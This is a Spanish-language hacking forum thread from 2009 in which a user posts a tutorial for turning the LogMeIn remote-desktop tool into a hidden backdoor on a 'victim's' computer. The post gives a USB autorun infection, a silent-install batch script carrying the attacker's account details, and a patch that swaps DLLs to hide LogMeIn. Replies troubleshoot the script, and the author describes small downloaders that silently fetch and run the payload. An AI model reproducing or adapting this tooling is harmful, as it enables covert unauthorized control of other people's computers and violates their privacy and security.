Bienvenido(a) a la comunidad, Visitante. Por favor, Ingresa tu usuario o Regístrate Gratis!.
Mayo 19, 2013, 09:23:52

Avisos:
Registrarse  
No seas tímido preséntate ACÁ!
Páginas: [1] 2  Todos   Ir Abajo
Imprimir
Tema: Troyano Indetectable con Logmein, haciendolo invisible  (Leído 6041 veces) Valoracion media: 0
0 Usuarios y 1 Visitante están viendo este tema.
Lordblacksuca
Dhackers.net
Gran Colaborador
*****

Gracias Recibidas: 7
Desconectado Desconectado

Sexo: Masculino
Mensajes: 1,129


10rdb14ck5uc4


WWW
« : Abril 13, 2009, 09:14:36 »




Hola gente, como veo que el foro esta un poco parado,   voy a ver si puedo hacer algun que otro manual,  para mantener algo de ritmo en el foro....

antes que nada, no estaba seguro si poner este post en hack basico o en avanzado, pero creo que encaja mas en basico.



Bueno, logmein, es un programa de escritorio virtual como VNC, solo que funciona a travez del puerto 80.

es desir...  no tiene barreras, ni antivirus que lo detecte.

te podes conectar a cualquier ordenador, no importa detras de cuantos routers o switchs este, ni de si tiene ip privada o publica.  es lo mismo.


vamos a aprender a "hackear" con logmein.   (en realidad es para aprender, para poder usar verdaderos troyanos el dia de mañana.)



OK, la idea es la siguiente, vamos a tener varias formas de infectar el ordenador de la victima, pero esta vez, vamos a suponer que tenemos acceso fisico al ordenador.  (ideal para probar en sus casas, o en cibers....  despues de desactivar el deep freeze jaja)


la  infeccion la vamos a hacer con una inyeccion usb, si tenes xp.   Si tenes vista, bueno, vas a tener que hacer doble click en el archivo jajjajaj..

yo ya prepare todo para una inyeccion rapida con un archivo batch

todo lo que necesitas es un pendrive para llevar los archivos


en el archivo rar, estan los siguientes archivos:


ejecutar.bat  -->  este es el archivo que tenes que ejecutar para que comienze la instalacion

LMI_Backdoor_by_lordblacksuca.msi -->   este es el instalador de Logmein modificado por mi.

autorun.inf  -->  Autorun, esto es para hacer la inyeccion usb

logmein-patch.exe  -->  este parche reempla 2 dll, del programa y lo hace totalmente invisible para la victima.



bueno, el procedimiento es el siguiente:

antes que nada, tenes que tener una cuenta en logmein.   www.logmein.com   es gratis para crear la cuenta.

Hay un post en el foro, que lo explica, por eso no lo detallo.



despues:



1).   Descargar el archivo y extraerlos en el root de un pendrive.


Registrarse  

2).   ahora, tienes que editar el archivo ejecutar.bat con tus datos. Lo tenes que abrir con el notepad, y editar la linea que dice:

LMI_Backdoor_by_Lordblacksuca.msi /qr USERPASSWORD=contraseña USERVERIFYPWD=contraseña USEREMAIL=tu-email@email.com USERWEBPASSWORD=contraseñadelaweb LicenseType=free

en donde dice "contraseña" es la contraseña del ordenardor,  las 2 tienen que ser iguales, eso lo pones a tu gusto.

donde dice tu-email@email.com y contraseñadelweb  tenes que poner tus datos de conexion de logmein.

3)   si tu victima tiene windows xp, solo tenes que enchufar el pendrive y listo!   se inicia una consola MS-DOS y ahi te va diciendo los pasos que va haciendo...  demora aproximadamente 30 segundos. (dependiendo la maquina)

si tu victima no tiene xp,  simplemente ejecutas el archivo ejecutar.bat


solo eso!!!


ahora para controlar la maquina de tu victima, entras en la web   de logmein   www.logmein.com   pones tu email y contraseña seleccionas el ordenador, y le haces click en control remoto.


cualquier duda   pregunta, no tengo problemas en responder.

a esto lo he diseñado yo, lordblacksuca, para dhackers.com.


saludos!





En un post reciente de ziion2000  vi unos downloaders, que pueden ser usados, para hacer un server de 5kb, en vez de los 10 Mb que ocupa este.
« Última modificación: Abril 14, 2009, 02:23:54 por Lordblacksuca » En línea


Lordblacksuca



ziion2000
Halterofilia vs gymnasia
Miembro
*****

Gracias Recibidas: 1
Desconectado Desconectado

Sexo: Masculino
Mensajes: 161


Weighlifting is my life Blacksite Team 4ever


« RESPONDER #1 : Abril 14, 2009, 01:15:33 »



increible la combinacion otra cosa es ziion2000 okas
En línea

Lordblacksuca
Dhackers.net
Gran Colaborador
*****

Gracias Recibidas: 7
Desconectado Desconectado

Sexo: Masculino
Mensajes: 1,129


10rdb14ck5uc4


WWW
« RESPONDER #2 : Abril 14, 2009, 02:25:44 »



ahi, esta perdon, ya corregi el error del nombre jejeje.



cabe aclarar que el proceso de instalacion es totalmente invisible, cuando se ejecuta el   archivo, ejecutar.bat  solo se ve una consola DOS, en donde dice cuando termina, solo eso....    es una instalacion completamente silenciosa de logmein
En línea

Lordblacksuca



Pred7
Miembro
*****

Gracias Recibidas: 0
Desconectado Desconectado

Sexo: Masculino
Mensajes: 62


Guacalas!!!!!


« RESPONDER #3 : Abril 15, 2009, 02:56:27 »



orale

que buen manual Lordblacksuca  biggrin biggrin biggrin biggrin

aki dejo el link del manual que dice como registrarse en logme in......


Registrarse  
http://foro.dhackers.com/hack-basico/intrusion-remota-sin-troyanos/


y aki dejo la pagina para la version free de logme in:


Registrarse  
https://secure.logmein.com/welcome/get_logmein_free/signup.asp?wt.srch=1&destination=/welcome/get_logmein_free/signup.asp&utpk=pc%20remoto&lang=es&originid=3958



salu2  biggrin biggrin biggrin biggrin
« Última modificación: Abril 05, 2010, 08:24:22 por BeParanoid » En línea
Lordblacksuca
Dhackers.net
Gran Colaborador
*****

Gracias Recibidas: 7
Desconectado Desconectado

Sexo: Masculino
Mensajes: 1,129


10rdb14ck5uc4


WWW
« RESPONDER #4 : Abril 15, 2009, 08:29:14 »



si, la version con la que yo hice el instalador silencioso,  es la version gratuita....  dura   para siempre,  es free
En línea

Lordblacksuca



Alevsk
Miembro
*****

Gracias Recibidas: 4
Desconectado Desconectado

Mensajes: 99



WWW
« RESPONDER #5 : Abril 22, 2009, 01:47:31 »



Urra por los 2  smile los felicito compañeros buen manual y bien explicado y automatizado  happy

salu2 smile
En línea



N0c7urn0
Miembro
*****

Gracias Recibidas: 0
Desconectado Desconectado

Mensajes: 8


« RESPONDER #6 : Mayo 25, 2009, 09:38:31 »



mmm...
esta muy bueno pero cuandoo instala el patch
mmmm falla, muestra errores!! y no se extraen los dll's

ok!
En línea
Lordblacksuca
Dhackers.net
Gran Colaborador
*****

Gracias Recibidas: 7
Desconectado Desconectado

Sexo: Masculino
Mensajes: 1,129


10rdb14ck5uc4


WWW
« RESPONDER #7 : Mayo 27, 2009, 12:14:41 »



ahhhh....  ya se lo que te esta pasando...     proba en cerrar el proceso de logmein para instalar el parche..   o haceclick derecho en el icono, y pone en salir.

porque lo que pasa es que no puede sobre-escribir los archivos, porque estan en uso.

si tengo tiempo en estos dias, lo corrijo y lo subo de nuevo.
En línea

Lordblacksuca



<< JMB >>
XD
Colaborador
*****

Gracias Recibidas: 6
Desconectado Desconectado

Sexo: Masculino
Mensajes: 598


whatever you like ¡¡


« RESPONDER #8 : Mayo 27, 2009, 12:39:54 »



te llevas mi un carma

aportaso lord

este tipo de cosas siempre me han gustado faciles

y cabronas

y mejor que un troyano eee
En línea



  
<< JMB >>
XD
Colaborador
*****

Gracias Recibidas: 6
Desconectado Desconectado

Sexo: Masculino
Mensajes: 598


whatever you like ¡¡


« RESPONDER #9 : Mayo 27, 2009, 02:41:23 »



bueno escribo de nuevo por que no miro la opcion modificar
que pasara quien sabe bueno


entonces
porque lo que pasa es que no puede sobre-escribir los archivos, porque estan en uso.

si tengo tiempo en estos dias, lo corrijo y lo subo de nuevo.


hay algun error en el programa tuyo por que no entendi eso

Citar
En un post reciente de ziion2000  vi unos downloaders, que pueden ser usados, para hacer un server de 5kb, en vez de los 10 Mb que ocupa este.


cual es el post y como logramos eso

En línea



  
Lordblacksuca
Dhackers.net
Gran Colaborador
*****

Gracias Recibidas: 7
Desconectado Desconectado

Sexo: Masculino
Mensajes: 1,129


10rdb14ck5uc4


WWW
« RESPONDER #10 : Mayo 27, 2009, 03:24:52 »



aqui esta la solución...    cambien el contenido del archivo ejecutar.bat   hay que agregar un par de lineas nada mas...  quedaria asi:

Código:
@echo off
Title Instalador de Backdoor con LogMeIn by Lordblacksuca
echo Instalando......    by lordblackuca



LMI_Backdoor_by_Lordblacksuca.msi /quiet USERPASSWORD=contraseña USERVERIFYPWD=contraseña USEREMAIL=tu-email@email.com USERWEBPASSWORD=contraseñadelaweb LicenseType=free



echo Espera...   este proceso puede tardar unos minutos dependiendo de la velocidad de tu equipo...
echo Instalacion terminada.
echo Terminando Procesos...
taskkill /f /IM LogMeInSystray.exe
taskkill /f /IM LogMeIn.exe
echo Aplicando Parche para que sea Invisible
logmein-patch.exe
echo Listo!
echo Creado por Lordblacksuca para www.dhackers.com
echo feel free to re-distribute   but,  the credits remain please.  ENJOY!!!
echo Libre para su re-distribucion, pero deja los creditos!    Disfrutalo!!!
echo happy hacking!!!
pause
exit


las lineas que agregé son éstas:

echo Terminando Procesos...
taskkill /f /IM LogMeInSystray.exe
taskkill /f /IM LogMeIn.exe


lo que pasa, es que el parche para hacerlo invisible, reemplaza 2 dll del programa, que cuando se termina de instalar, se ejecuta automaticamente...  entones, hay que terminar con los dos ejecutables que usan las dll, y listo...


luego, cuando termine el proceso,  cuando la maquina se reinicie, logmein se va a ejecutar automaticamente, y silenciosamente.





JMB, el post con los downloaders es este:


Registrarse  
« Última modificación: Abril 05, 2010, 08:23:10 por BeParanoid » En línea

Lordblacksuca



<< JMB >>
XD
Colaborador
*****

Gracias Recibidas: 6
Desconectado Desconectado

Sexo: Masculino
Mensajes: 598


whatever you like ¡¡


« RESPONDER #11 : Mayo 27, 2009, 11:33:11 »



ok ok y el  downloaders

Citar
En un post reciente de ziion2000  vi unos downloaders, que pueden ser usados, para hacer un server de 5kb, en vez de los 10 Mb que ocupa este.


ok ok te refierres a un server de un troyano no ???

por que 10 mb  no se pueden concertir en 5 kb
En línea



  
Lordblacksuca
Dhackers.net
Gran Colaborador
*****

Gracias Recibidas: 7
Desconectado Desconectado

Sexo: Masculino
Mensajes: 1,129


10rdb14ck5uc4


WWW
« RESPONDER #12 : Mayo 28, 2009, 01:01:33 »



los downloaders, como dice en el post del link que te pase:

vos subis todo el archivo de 10 mb a un servidor web....     y con el downloader creas un mini server de 5k que lo unico que hace es descargar silenciosamente todo el contenido del link que le pusiste...  cuando lo descarga...lo ejecuta.

En línea

Lordblacksuca



<< JMB >>
XD
Colaborador
*****

Gracias Recibidas: 6
Desconectado Desconectado

Sexo: Masculino
Mensajes: 598


whatever you like ¡¡


« RESPONDER #13 : Mayo 28, 2009, 01:51:55 »



los downloaders, como dice en el post del link que te pase:

vos subis todo el archivo de 10 mb a un servidor web....     y con el downloader creas un mini server de 5k que lo unico que hace es descargar silenciosamente todo el contenido del link que le pusiste...  cuando lo descarga...lo ejecuta.



ok ok ya capte  esa era mi duda
lo aplicare haver si funciona con el  downloader   espero y si
alguno ya lo probo asi
o tu lord ???

En línea



  
Fran
Miembro
*****

Gracias Recibidas: 1
Desconectado Desconectado

Mensajes: 189


« RESPONDER #14 : Mayo 29, 2009, 06:57:26 »



Bueno muchachos, mis felicitaciones por el aporte, es excelente
tengo un "pequeño problema", a ver si me pueden hechar un cable
consigo entrar en log me in..todo perfecto...hasta que llega el punto de conectar, que se queda parado asi, como les adjunto en la captura
¿que puede ser?
un saludo y gracias

En línea

<< JMB >>
XD
Colaborador
*****

Gracias Recibidas: 6
Desconectado Desconectado

Sexo: Masculino
Mensajes: 598


whatever you like ¡¡


« RESPONDER #15 : Mayo 29, 2009, 09:08:52 »



hola fran lo siste con el  downloader  
alo de tu respuesta espero mos a lord ¡¡¡


modifica la imagen esta muy grande
En línea



  
Páginas: [1] 2  Todos   Ir Arriba
Imprimir
Ir a:  



Ingresar con nombre de usuario, contraseña y duración de la sesión
Copyright DH © 2007 - 2013 | Dhackers.com | Powered by SMF 1.1.18 | SMF © 2006-2008, Simple Machines LLC | XHTML 1.0 válido!
Página creada en 1.5 segundos con 33 consultas.

Nuestros Afiliados:
| Nakp | Blog |_ocutus |